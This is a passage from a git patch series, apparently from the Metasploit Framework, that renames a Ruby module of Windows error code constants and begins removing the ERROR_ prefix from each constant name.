ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x3652 + ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x3653 + ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x3654 + ERROR_IPSEC_BAD_SPI = 0x3656 + ERROR_IPSEC_SA_LIFETIME_EXPIRED = 0x3657 + ERROR_IPSEC_WRONG_SA = 0x3658 + ERROR_IPSEC_REPLAY_CHECK_FAILED = 0x3659 + ERROR_IPSEC_INVALID_PACKET = 0x365A + ERROR_IPSEC_INTEGRITY_CHECK_FAILED = 0x365B + ERROR_IPSEC_CLEAR_TEXT_DROP = 0x365C + ERROR_IPSEC_AUTH_FIREWALL_DROP = 0x365D + ERROR_IPSEC_THROTTLE_DROP = 0x365E + ERROR_IPSEC_DOSP_BLOCK = 0x3665 + ERROR_IPSEC_DOSP_RECEIVED_MULTICAST = 0x3666 + ERROR_IPSEC_DOSP_INVALID_PACKET = 0x3667 + ERROR_IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x3668 + ERROR_IPSEC_DOSP_MAX_ENTRIES = 0x3669 + ERROR_IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x366A + ERROR_IPSEC_DOSP_NOT_INSTALLED = 0x366B + ERROR_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x366C + ERROR_SXS_SECTION_NOT_FOUND = 0x36B0 + ERROR_SXS_CANT_GEN_ACTCTX = 0x36B1 + ERROR_SXS_INVALID_ACTCTXDATA_FORMAT = 0x36B2 + ERROR_SXS_ASSEMBLY_NOT_FOUND = 0x36B3 + ERROR_SXS_MANIFEST_FORMAT_ERROR = 0x36B4 + ERROR_SXS_MANIFEST_PARSE_ERROR = 0x36B5 + ERROR_SXS_ACTIVATION_CONTEXT_DISABLED = 0x36B6 + ERROR_SXS_KEY_NOT_FOUND = 0x36B7 + ERROR_SXS_VERSION_CONFLICT = 0x36B8 + ERROR_SXS_WRONG_SECTION_TYPE = 0x36B9 + ERROR_SXS_THREAD_QUERIES_DISABLED = 0x36BA + ERROR_SXS_PROCESS_DEFAULT_ALREADY_SET = 0x36BB + ERROR_SXS_UNKNOWN_ENCODING_GROUP = 0x36BC + ERROR_SXS_UNKNOWN_ENCODING = 0x36BD + ERROR_SXS_INVALID_XML_NAMESPACE_URI = 0x36BE + ERROR_SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36BF + ERROR_SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36C0 + ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36C1 + ERROR_SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x36C2 + ERROR_SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x36C3 + ERROR_SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x36C4 + ERROR_SXS_DUPLICATE_DLL_NAME = 0x36C5 + ERROR_SXS_DUPLICATE_WINDOWCLASS_NAME = 0x36C6 + ERROR_SXS_DUPLICATE_CLSID = 0x36C7 + ERROR_SXS_DUPLICATE_IID = 0x36C8 + ERROR_SXS_DUPLICATE_TLBID = 0x36C9 + ERROR_SXS_DUPLICATE_PROGID = 0x36CA + ERROR_SXS_DUPLICATE_ASSEMBLY_NAME = 0x36CB + ERROR_SXS_FILE_HASH_MISMATCH = 0x36CC + ERROR_SXS_POLICY_PARSE_ERROR = 0x36CD + ERROR_SXS_XML_E_MISSINGQUOTE = 0x36CE + ERROR_SXS_XML_E_COMMENTSYNTAX = 0x36CF + ERROR_SXS_XML_E_BADSTARTNAMECHAR = 0x36D0 + ERROR_SXS_XML_E_BADNAMECHAR = 0x36D1 + ERROR_SXS_XML_E_BADCHARINSTRING = 0x36D2 + ERROR_SXS_XML_E_XMLDECLSYNTAX = 0x36D3 + ERROR_SXS_XML_E_BADCHARDATA = 0x36D4 + ERROR_SXS_XML_E_MISSINGWHITESPACE = 0x36D5 + ERROR_SXS_XML_E_EXPECTINGTAGEND = 0x36D6 + ERROR_SXS_XML_E_MISSINGSEMICOLON = 0x36D7 + ERROR_SXS_XML_E_UNBALANCEDPAREN = 0x36D8 + ERROR_SXS_XML_E_INTERNALERROR = 0x36D9 + ERROR_SXS_XML_E_UNEXPECTED_WHITESPACE = 0x36DA + ERROR_SXS_XML_E_INCOMPLETE_ENCODING = 0x36DB + ERROR_SXS_XML_E_MISSING_PAREN = 0x36DC + ERROR_SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x36DD + ERROR_SXS_XML_E_MULTIPLE_COLONS = 0x36DE + ERROR_SXS_XML_E_INVALID_DECIMAL = 0x36DF + ERROR_SXS_XML_E_INVALID_HEXIDECIMAL = 0x36E0 + ERROR_SXS_XML_E_INVALID_UNICODE = 0x36E1 + ERROR_SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x36E2 + ERROR_SXS_XML_E_UNEXPECTEDENDTAG = 0x36E3 + ERROR_SXS_XML_E_UNCLOSEDTAG = 0x36E4 + ERROR_SXS_XML_E_DUPLICATEATTRIBUTE = 0x36E5 + ERROR_SXS_XML_E_MULTIPLEROOTS = 0x36E6 + ERROR_SXS_XML_E_INVALIDATROOTLEVEL = 0x36E7 + ERROR_SXS_XML_E_BADXMLDECL = 0x36E8 + ERROR_SXS_XML_E_MISSINGROOT = 0x36E9 + ERROR_SXS_XML_E_UNEXPECTEDEOF = 0x36EA + ERROR_SXS_XML_E_BADPEREFINSUBSET = 0x36EB + ERROR_SXS_XML_E_UNCLOSEDSTARTTAG = 0x36EC + ERROR_SXS_XML_E_UNCLOSEDENDTAG = 0x36ED + ERROR_SXS_XML_E_UNCLOSEDSTRING = 0x36EE + ERROR_SXS_XML_E_UNCLOSEDCOMMENT = 0x36EF + ERROR_SXS_XML_E_UNCLOSEDDECL = 0x36F0 + ERROR_SXS_XML_E_UNCLOSEDCDATA = 0x36F1 + ERROR_SXS_XML_E_RESERVEDNAMESPACE = 0x36F2 + ERROR_SXS_XML_E_INVALIDENCODING = 0x36F3 + ERROR_SXS_XML_E_INVALIDSWITCH = 0x36F4 + ERROR_SXS_XML_E_BADXMLCASE = 0x36F5 + ERROR_SXS_XML_E_INVALID_STANDALONE = 0x36F6 + ERROR_SXS_XML_E_UNEXPECTED_STANDALONE = 0x36F7 + ERROR_SXS_XML_E_INVALID_VERSION = 0x36F8 + ERROR_SXS_XML_E_MISSINGEQUALS = 0x36F9 + ERROR_SXS_PROTECTION_RECOVERY_FAILED = 0x36FA + ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x36FB + ERROR_SXS_PROTECTION_CATALOG_NOT_VALID = 0x36FC + ERROR_SXS_UNTRANSLATABLE_HRESULT = 0x36FD + ERROR_SXS_PROTECTION_CATALOG_FILE_MISSING = 0x36FE + ERROR_SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36FF + ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x3700 + ERROR_SXS_ASSEMBLY_MISSING = 0x3701 + ERROR_SXS_CORRUPT_ACTIVATION_STACK = 0x3702 + ERROR_SXS_CORRUPTION = 0x3703 + ERROR_SXS_EARLY_DEACTIVATION = 0x3704 + ERROR_SXS_INVALID_DEACTIVATION = 0x3705 + ERROR_SXS_MULTIPLE_DEACTIVATION = 0x3706 + ERROR_SXS_PROCESS_TERMINATION_REQUESTED = 0x3707 + ERROR_SXS_RELEASE_ACTIVATION_CONTEXT = 0x3708 + ERROR_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x3709 + ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x370A + ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x370B + ERROR_SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x370C + ERROR_SXS_IDENTITY_PARSE_ERROR = 0x370D + ERROR_MALFORMED_SUBSTITUTION_STRING = 0x370E + ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x370F + ERROR_UNMAPPED_SUBSTITUTION_STRING = 0x3710 + ERROR_SXS_ASSEMBLY_NOT_LOCKED = 0x3711 + ERROR_SXS_COMPONENT_STORE_CORRUPT = 0x3712 + ERROR_ADVANCED_INSTALLER_FAILED = 0x3713 + ERROR_XML_ENCODING_MISMATCH = 0x3714 + ERROR_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x3715 + ERROR_SXS_IDENTITIES_DIFFERENT = 0x3716 + ERROR_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x3717 + ERROR_SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x3718 + ERROR_SXS_MANIFEST_TOO_BIG = 0x3719 + ERROR_SXS_SETTING_NOT_REGISTERED = 0x371A + ERROR_SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x371B + ERROR_SMI_PRIMITIVE_INSTALLER_FAILED = 0x371C + ERROR_GENERIC_COMMAND_FAILED = 0x371D + ERROR_SXS_FILE_HASH_MISSING = 0x371E + ERROR_EVT_INVALID_CHANNEL_PATH = 0x3A98 + ERROR_EVT_INVALID_QUERY = 0x3A99 + ERROR_EVT_PUBLISHER_METADATA_NOT_FOUND = 0x3A9A + ERROR_EVT_EVENT_TEMPLATE_NOT_FOUND = 0x3A9B + ERROR_EVT_INVALID_PUBLISHER_NAME = 0x3A9C + ERROR_EVT_INVALID_EVENT_DATA = 0x3A9D + ERROR_EVT_CHANNEL_NOT_FOUND = 0x3A9F + ERROR_EVT_MALFORMED_XML_TEXT = 0x3AA0 + ERROR_EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x3AA1 + ERROR_EVT_CONFIGURATION_ERROR = 0x3AA2 + ERROR_EVT_QUERY_RESULT_STALE = 0x3AA3 + ERROR_EVT_QUERY_RESULT_INVALID_POSITION = 0x3AA4 + ERROR_EVT_NON_VALIDATING_MSXML = 0x3AA5 + ERROR_EVT_FILTER_ALREADYSCOPED = 0x3AA6 + ERROR_EVT_FILTER_NOTELTSET = 0x3AA7 + ERROR_EVT_FILTER_INVARG = 0x3AA8 + ERROR_EVT_FILTER_INVTEST = 0x3AA9 + ERROR_EVT_FILTER_INVTYPE = 0x3AAA + ERROR_EVT_FILTER_PARSEERR = 0x3AAB + ERROR_EVT_FILTER_UNSUPPORTEDOP = 0x3AAC + ERROR_EVT_FILTER_UNEXPECTEDTOKEN = 0x3AAD + ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x3AAE + ERROR_EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x3AAF + ERROR_EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x3AB0 + ERROR_EVT_CHANNEL_CANNOT_ACTIVATE = 0x3AB1 + ERROR_EVT_FILTER_TOO_COMPLEX = 0x3AB2 + ERROR_EVT_MESSAGE_NOT_FOUND = 0x3AB3 + ERROR_EVT_MESSAGE_ID_NOT_FOUND = 0x3AB4 + ERROR_EVT_UNRESOLVED_VALUE_INSERT = 0x3AB5 + ERROR_EVT_UNRESOLVED_PARAMETER_INSERT = 0x3AB6 + ERROR_EVT_MAX_INSERTS_REACHED = 0x3AB7 + ERROR_EVT_EVENT_DEFINITION_NOT_FOUND = 0x3AB8 + ERROR_EVT_MESSAGE_LOCALE_NOT_FOUND = 0x3AB9 + ERROR_EVT_VERSION_TOO_OLD = 0x3ABA + ERROR_EVT_VERSION_TOO_NEW = 0x3ABB + ERROR_EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x3ABC + ERROR_EVT_PUBLISHER_DISABLED = 0x3ABD + ERROR_EVT_FILTER_OUT_OF_RANGE = 0x3ABE + ERROR_EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x3AE8 + ERROR_EC_LOG_DISABLED = 0x3AE9 + ERROR_EC_CIRCULAR_FORWARDING = 0x3AEA + ERROR_EC_CREDSTORE_FULL = 0x3AEB + ERROR_EC_CRED_NOT_FOUND = 0x3AEC + ERROR_EC_NO_ACTIVE_CHANNEL = 0x3AED + ERROR_MUI_FILE_NOT_FOUND = 0x3AFC + ERROR_MUI_INVALID_FILE = 0x3AFD + ERROR_MUI_INVALID_RC_CONFIG = 0x3AFE + ERROR_MUI_INVALID_LOCALE_NAME = 0x3AFF + ERROR_MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x3B00 + ERROR_MUI_FILE_NOT_LOADED = 0x3B01 + ERROR_RESOURCE_ENUM_USER_STOP = 0x3B02 + ERROR_MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x3B03 + ERROR_MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x3B04 + ERROR_MCA_INVALID_CAPABILITIES_STRING = 0x3B60 + ERROR_MCA_INVALID_VCP_VERSION = 0x3B61 + ERROR_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x3B62 + ERROR_MCA_MCCS_VERSION_MISMATCH = 0x3B63 + ERROR_MCA_UNSUPPORTED_MCCS_VERSION = 0x3B64 + ERROR_MCA_INTERNAL_ERROR = 0x3B65 + ERROR_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x3B66 + ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x3B67 + ERROR_AMBIGUOUS_SYSTEM_DEVICE = 0x3B92 + ERROR_SYSTEM_DEVICE_NOT_FOUND = 0x3BC3 + ERROR_HASH_NOT_SUPPORTED = 0x3BC4 + ERROR_HASH_NOT_PRESENT = 0x3BC5 + +end From 08a44fdfb73faf7bc07046c362b322faa481c4a8 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 19:48:17 +0000 Subject: [PATCH 061/205] Filename match module --- lib/msf/core/post/windows.rb | 2 +- lib/msf/core/post/windows/{errors.rb => error.rb} | 0 2 files changed, 1 insertion(+), 1 deletion(-) rename lib/msf/core/post/windows/{errors.rb => error.rb} (100%) diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb index 92467600b2..af386267c3 100644 --- a/lib/msf/core/post/windows.rb +++ b/lib/msf/core/post/windows.rb @@ -1,6 +1,6 @@ module Msf::Post::Windows - require 'msf/core/post/windows/errors' + require 'msf/core/post/windows/error' require 'msf/core/post/windows/accounts' require 'msf/core/post/windows/cli_parse' require 'msf/core/post/windows/eventlog' diff --git a/lib/msf/core/post/windows/errors.rb b/lib/msf/core/post/windows/error.rb similarity index 100% rename from lib/msf/core/post/windows/errors.rb rename to lib/msf/core/post/windows/error.rb From 06b399ee30900119641e2afc4b7ef7dbb4bda50d Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 19:52:11 +0000 Subject: [PATCH 062/205] Remove ERROR_ To access as Error::NO_ACCESS --- lib/msf/core/post/windows/error.rb | 4578 ++++++++++++++-------------- 1 file changed, 2289 insertions(+), 2289 deletions(-) diff --git a/lib/msf/core/post/windows/error.rb b/lib/msf/core/post/windows/error.rb index a2cfab530f..f8a17513ef 100644 --- a/lib/msf/core/post/windows/error.rb +++ b/lib/msf/core/post/windows/error.rb @@ -1,930 +1,930 @@ module Msf::Post::Windows::Error - ERROR_SUCCESS = 0x0000 - ERROR_INVALID_FUNCTION = 0x0001 - ERROR_FILE_NOT_FOUND = 0x0002 - ERROR_PATH_NOT_FOUND = 0x0003 - ERROR_TOO_MANY_OPEN_FILES = 0x0004 - ERROR_ACCESS_DENIED = 0x0005 - ERROR_INVALID_HANDLE = 0x0006 - ERROR_ARENA_TRASHED = 0x0007 - ERROR_NOT_ENOUGH_MEMORY = 0x0008 - ERROR_INVALID_BLOCK = 0x0009 - ERROR_BAD_ENVIRONMENT = 0x000A - ERROR_BAD_FORMAT = 0x000B - ERROR_INVALID_ACCESS = 0x000C - ERROR_INVALID_DATA = 0x000D - ERROR_OUTOFMEMORY = 0x000E - ERROR_INVALID_DRIVE = 0x000F - ERROR_CURRENT_DIRECTORY = 0x0010 - ERROR_NOT_SAME_DEVICE = 0x0011 - ERROR_NO_MORE_FILES = 0x0012 - ERROR_WRITE_PROTECT = 0x0013 - ERROR_BAD_UNIT = 0x0014 - ERROR_NOT_READY = 0x0015 - ERROR_BAD_COMMAND = 0x0016 - ERROR_CRC = 0x0017 - ERROR_BAD_LENGTH = 0x0018 - ERROR_SEEK = 0x0019 - ERROR_NOT_DOS_DISK = 0x001A - ERROR_SECTOR_NOT_FOUND = 0x001B - ERROR_OUT_OF_PAPER = 0x001C - ERROR_WRITE_FAULT = 0x001D - ERROR_READ_FAULT = 0x001E - ERROR_GEN_FAILURE = 0x001F - ERROR_SHARING_VIOLATION = 0x0020 - ERROR_LOCK_VIOLATION = 0x0021 - ERROR_WRONG_DISK = 0x0022 - ERROR_SHARING_BUFFER_EXCEEDED = 0x0024 - ERROR_HANDLE_EOF = 0x0026 - ERROR_HANDLE_DISK_FULL = 0x0027 - ERROR_NOT_SUPPORTED = 0x0032 - ERROR_REM_NOT_LIST = 0x0033 - ERROR_DUP_NAME = 0x0034 - ERROR_BAD_NETPATH = 0x0035 - ERROR_NETWORK_BUSY = 0x0036 - ERROR_DEV_NOT_EXIST = 0x0037 - ERROR_TOO_MANY_CMDS = 0x0038 - ERROR_ADAP_HDW_ERR = 0x0039 - ERROR_BAD_NET_RESP = 0x003A - ERROR_UNEXP_NET_ERR = 0x003B - ERROR_BAD_REM_ADAP = 0x003C - ERROR_PRINTQ_FULL = 0x003D - ERROR_NO_SPOOL_SPACE = 0x003E - ERROR_PRINT_CANCELLED = 0x003F - ERROR_NETNAME_DELETED = 0x0040 - ERROR_NETWORK_ACCESS_DENIED = 0x0041 - ERROR_BAD_DEV_TYPE = 0x0042 - ERROR_BAD_NET_NAME = 0x0043 - ERROR_TOO_MANY_NAMES = 0x0044 - ERROR_TOO_MANY_SESS = 0x0045 - ERROR_SHARING_PAUSED = 0x0046 - ERROR_REQ_NOT_ACCEP = 0x0047 - ERROR_REDIR_PAUSED = 0x0048 - ERROR_FILE_EXISTS = 0x0050 - ERROR_CANNOT_MAKE = 0x0052 - ERROR_FAIL_I24 = 0x0053 - ERROR_OUT_OF_STRUCTURES = 0x0054 - ERROR_ALREADY_ASSIGNED = 0x0055 - ERROR_INVALID_PASSWORD = 0x0056 - ERROR_INVALID_PARAMETER = 0x0057 - ERROR_NET_WRITE_FAULT = 0x0058 - ERROR_NO_PROC_SLOTS = 0x0059 - ERROR_TOO_MANY_SEMAPHORES = 0x0064 - ERROR_EXCL_SEM_ALREADY_OWNED = 0x0065 - ERROR_SEM_IS_SET = 0x0066 - ERROR_TOO_MANY_SEM_REQUESTS = 0x0067 - ERROR_INVALID_AT_INTERRUPT_TIME = 0x0068 - ERROR_SEM_OWNER_DIED = 0x0069 - ERROR_SEM_USER_LIMIT = 0x006A - ERROR_DISK_CHANGE = 0x006B - ERROR_DRIVE_LOCKED = 0x006C - ERROR_BROKEN_PIPE = 0x006D - ERROR_OPEN_FAILED = 0x006E - ERROR_BUFFER_OVERFLOW = 0x006F - ERROR_DISK_FULL = 0x0070 - ERROR_NO_MORE_SEARCH_HANDLES = 0x0071 - ERROR_INVALID_TARGET_HANDLE = 0x0072 - ERROR_INVALID_CATEGORY = 0x0075 - ERROR_INVALID_VERIFY_SWITCH = 0x0076 - ERROR_BAD_DRIVER_LEVEL = 0x0077 - ERROR_CALL_NOT_IMPLEMENTED = 0x0078 - ERROR_SEM_TIMEOUT = 0x0079 - ERROR_INSUFFICIENT_BUFFER = 0x007A - ERROR_INVALID_NAME = 0x007B - ERROR_INVALID_LEVEL = 0x007C - ERROR_NO_VOLUME_LABEL = 0x007D - ERROR_MOD_NOT_FOUND = 0x007E - ERROR_PROC_NOT_FOUND = 0x007F - ERROR_WAIT_NO_CHILDREN = 0x0080 - ERROR_CHILD_NOT_COMPLETE = 0x0081 - ERROR_DIRECT_ACCESS_HANDLE = 0x0082 - ERROR_NEGATIVE_SEEK = 0x0083 - ERROR_SEEK_ON_DEVICE = 0x0084 - ERROR_IS_JOIN_TARGET = 0x0085 - ERROR_IS_JOINED = 0x0086 - ERROR_IS_SUBSTED = 0x0087 - ERROR_NOT_JOINED = 0x0088 - ERROR_NOT_SUBSTED = 0x0089 - ERROR_JOIN_TO_JOIN = 0x008A - ERROR_SUBST_TO_SUBST = 0x008B - ERROR_JOIN_TO_SUBST = 0x008C - ERROR_SUBST_TO_JOIN = 0x008D - ERROR_BUSY_DRIVE = 0x008E - ERROR_SAME_DRIVE = 0x008F - ERROR_DIR_NOT_ROOT = 0x0090 - ERROR_DIR_NOT_EMPTY = 0x0091 - ERROR_IS_SUBST_PATH = 0x0092 - ERROR_IS_JOIN_PATH = 0x0093 - ERROR_PATH_BUSY = 0x0094 - ERROR_IS_SUBST_TARGET = 0x0095 - ERROR_SYSTEM_TRACE = 0x0096 - ERROR_INVALID_EVENT_COUNT = 0x0097 - ERROR_TOO_MANY_MUXWAITERS = 0x0098 - ERROR_INVALID_LIST_FORMAT = 0x0099 - ERROR_LABEL_TOO_LONG = 0x009A - ERROR_TOO_MANY_TCBS = 0x009B - ERROR_SIGNAL_REFUSED = 0x009C - ERROR_DISCARDED = 0x009D - ERROR_NOT_LOCKED = 0x009E - ERROR_BAD_THREADID_ADDR = 0x009F - ERROR_BAD_ARGUMENTS = 0x00A0 - ERROR_BAD_PATHNAME = 0x00A1 - ERROR_SIGNAL_PENDING = 0x00A2 - ERROR_MAX_THRDS_REACHED = 0x00A4 - ERROR_LOCK_FAILED = 0x00A7 - ERROR_BUSY = 0x00AA - ERROR_CANCEL_VIOLATION = 0x00AD - ERROR_ATOMIC_LOCKS_NOT_SUPPORTED = 0x00AE - ERROR_INVALID_SEGMENT_NUMBER = 0x00B4 - ERROR_INVALID_ORDINAL = 0x00B6 - ERROR_ALREADY_EXISTS = 0x00B7 - ERROR_INVALID_FLAG_NUMBER = 0x00BA - ERROR_SEM_NOT_FOUND = 0x00BB - ERROR_INVALID_STARTING_CODESEG = 0x00BC - ERROR_INVALID_STACKSEG = 0x00BD - ERROR_INVALID_MODULETYPE = 0x00BE - ERROR_INVALID_EXE_SIGNATURE = 0x00BF - ERROR_EXE_MARKED_INVALID = 0x00C0 - ERROR_BAD_EXE_FORMAT = 0x00C1 - ERROR_ITERATED_DATA_EXCEEDS_64k = 0x00C2 - ERROR_INVALID_MINALLOCSIZE = 0x00C3 - ERROR_DYNLINK_FROM_INVALID_RING = 0x00C4 - ERROR_IOPL_NOT_ENABLED = 0x00C5 - ERROR_INVALID_SEGDPL = 0x00C6 - ERROR_AUTODATASEG_EXCEEDS_64k = 0x00C7 - ERROR_RING2SEG_MUST_BE_MOVABLE = 0x00C8 - ERROR_RELOC_CHAIN_XEEDS_SEGLIM = 0x00C9 - ERROR_INFLOOP_IN_RELOC_CHAIN = 0x00CA - ERROR_ENVVAR_NOT_FOUND = 0x00CB - ERROR_NO_SIGNAL_SENT = 0x00CD - ERROR_FILENAME_EXCED_RANGE = 0x00CE - ERROR_RING2_STACK_IN_USE = 0x00CF - ERROR_META_EXPANSION_TOO_LONG = 0x00D0 - ERROR_INVALID_SIGNAL_NUMBER = 0x00D1 - ERROR_THREAD_1_INACTIVE = 0x00D2 - ERROR_LOCKED = 0x00D4 - ERROR_TOO_MANY_MODULES = 0x00D6 - ERROR_NESTING_NOT_ALLOWED = 0x00D7 - ERROR_EXE_MACHINE_TYPE_MISMATCH = 0x00D8 - ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x00D9 - ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x00DA - ERROR_FILE_CHECKED_OUT = 0x00DC - ERROR_CHECKOUT_REQUIRED = 0x00DD - ERROR_BAD_FILE_TYPE = 0x00DE - ERROR_FILE_TOO_LARGE = 0x00DF - ERROR_FORMS_AUTH_REQUIRED = 0x00E0 - ERROR_VIRUS_INFECTED = 0x00E1 - ERROR_VIRUS_DELETED = 0x00E2 - ERROR_PIPE_LOCAL = 0x00E5 - ERROR_BAD_PIPE = 0x00E6 - ERROR_PIPE_BUSY = 0x00E7 - ERROR_NO_DATA = 0x00E8 - ERROR_PIPE_NOT_CONNECTED = 0x00E9 - ERROR_MORE_DATA = 0x00EA - ERROR_VC_DISCONNECTED = 0x00F0 - ERROR_INVALID_EA_NAME = 0x00FE - ERROR_EA_LIST_INCONSISTENT = 0x00FF - ERROR_WAIT_TIMEOUT = 0x0102 - ERROR_NO_MORE_ITEMS = 0x0103 - ERROR_CANNOT_COPY = 0x010A - ERROR_DIRECTORY = 0x010B - ERROR_EAS_DIDNT_FIT = 0x0113 - ERROR_EA_FILE_CORRUPT = 0x0114 - ERROR_EA_TABLE_FULL = 0x0115 - ERROR_INVALID_EA_HANDLE = 0x0116 - ERROR_EAS_NOT_SUPPORTED = 0x011A - ERROR_NOT_OWNER = 0x0120 - ERROR_TOO_MANY_POSTS = 0x012A - ERROR_PARTIAL_COPY = 0x012B - ERROR_OPLOCK_NOT_GRANTED = 0x012C - ERROR_INVALID_OPLOCK_PROTOCOL = 0x012D - ERROR_DISK_TOO_FRAGMENTED = 0x012E - ERROR_DELETE_PENDING = 0x012F - ERROR_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x0130 - ERROR_SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x0131 - ERROR_SECURITY_STREAM_IS_INCONSISTENT = 0x0132 - ERROR_INVALID_LOCK_RANGE = 0x0133 - ERROR_IMAGE_SUBSYSTEM_NOT_PRESENT = 0x0134 - ERROR_NOTIFICATION_GUID_ALREADY_DEFINED = 0x0135 - ERROR_MR_MID_NOT_FOUND = 0x013D - ERROR_SCOPE_NOT_FOUND = 0x013E - ERROR_FAIL_NOACTION_REBOOT = 0x015E - ERROR_FAIL_SHUTDOWN = 0x015F - ERROR_FAIL_RESTART = 0x0160 - ERROR_MAX_SESSIONS_REACHED = 0x0161 - ERROR_THREAD_MODE_ALREADY_BACKGROUND = 0x0190 - ERROR_THREAD_MODE_NOT_BACKGROUND = 0x0191 - ERROR_PROCESS_MODE_ALREADY_BACKGROUND = 0x0192 - ERROR_PROCESS_MODE_NOT_BACKGROUND = 0x0193 - ERROR_INVALID_ADDRESS = 0x01E7 - ERROR_USER_PROFILE_LOAD = 0x01F4 - ERROR_ARITHMETIC_OVERFLOW = 0x0216 - ERROR_PIPE_CONNECTED = 0x0217 - ERROR_PIPE_LISTENING = 0x0218 - ERROR_VERIFIER_STOP = 0x0219 - ERROR_ABIOS_ERROR = 0x021A - ERROR_WX86_WARNING = 0x021B - ERROR_WX86_ERROR = 0x021C - ERROR_TIMER_NOT_CANCELED = 0x021D - ERROR_UNWIND = 0x021E - ERROR_BAD_STACK = 0x021F - ERROR_INVALID_UNWIND_TARGET = 0x0220 - ERROR_INVALID_PORT_ATTRIBUTES = 0x0221 - ERROR_PORT_MESSAGE_TOO_LONG = 0x0222 - ERROR_INVALID_QUOTA_LOWER = 0x0223 - ERROR_DEVICE_ALREADY_ATTACHED = 0x0224 - ERROR_INSTRUCTION_MISALIGNMENT = 0x0225 - ERROR_PROFILING_NOT_STARTED = 0x0226 - ERROR_PROFILING_NOT_STOPPED = 0x0227 - ERROR_COULD_NOT_INTERPRET = 0x0228 - ERROR_PROFILING_AT_LIMIT = 0x0229 - ERROR_CANT_WAIT = 0x022A - ERROR_CANT_TERMINATE_SELF = 0x022B - ERROR_UNEXPECTED_MM_CREATE_ERR = 0x022C - ERROR_UNEXPECTED_MM_MAP_ERROR = 0x022D - ERROR_UNEXPECTED_MM_EXTEND_ERR = 0x022E - ERROR_BAD_FUNCTION_TABLE = 0x022F - ERROR_NO_GUID_TRANSLATION = 0x0230 - ERROR_INVALID_LDT_SIZE = 0x0231 - ERROR_INVALID_LDT_OFFSET = 0x0233 - ERROR_INVALID_LDT_DESCRIPTOR = 0x0234 - ERROR_TOO_MANY_THREADS = 0x0235 - ERROR_THREAD_NOT_IN_PROCESS = 0x0236 - ERROR_PAGEFILE_QUOTA_EXCEEDED = 0x0237 - ERROR_LOGON_SERVER_CONFLICT = 0x0238 - ERROR_SYNCHRONIZATION_REQUIRED = 0x0239 - ERROR_NET_OPEN_FAILED = 0x023A - ERROR_IO_PRIVILEGE_FAILED = 0x023B - ERROR_CONTROL_C_EXIT = 0x023C - ERROR_MISSING_SYSTEMFILE = 0x023D - ERROR_UNHANDLED_EXCEPTION = 0x023E - ERROR_APP_INIT_FAILURE = 0x023F - ERROR_PAGEFILE_CREATE_FAILED = 0x0240 - ERROR_INVALID_IMAGE_HASH = 0x0241 - ERROR_NO_PAGEFILE = 0x0242 - ERROR_ILLEGAL_FLOAT_CONTEXT = 0x0243 - ERROR_NO_EVENT_PAIR = 0x0244 - ERROR_DOMAIN_CTRLR_CONFIG_ERROR = 0x0245 - ERROR_ILLEGAL_CHARACTER = 0x0246 - ERROR_UNDEFINED_CHARACTER = 0x0247 - ERROR_FLOPPY_VOLUME = 0x0248 - ERROR_BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x0249 - ERROR_BACKUP_CONTROLLER = 0x024A - ERROR_MUTANT_LIMIT_EXCEEDED = 0x024B - ERROR_FS_DRIVER_REQUIRED = 0x024C - ERROR_CANNOT_LOAD_REGISTRY_FILE = 0x024D - ERROR_DEBUG_ATTACH_FAILED = 0x024E - ERROR_SYSTEM_PROCESS_TERMINATED = 0x024F - ERROR_DATA_NOT_ACCEPTED = 0x0250 - ERROR_VDM_HARD_ERROR = 0x0251 - 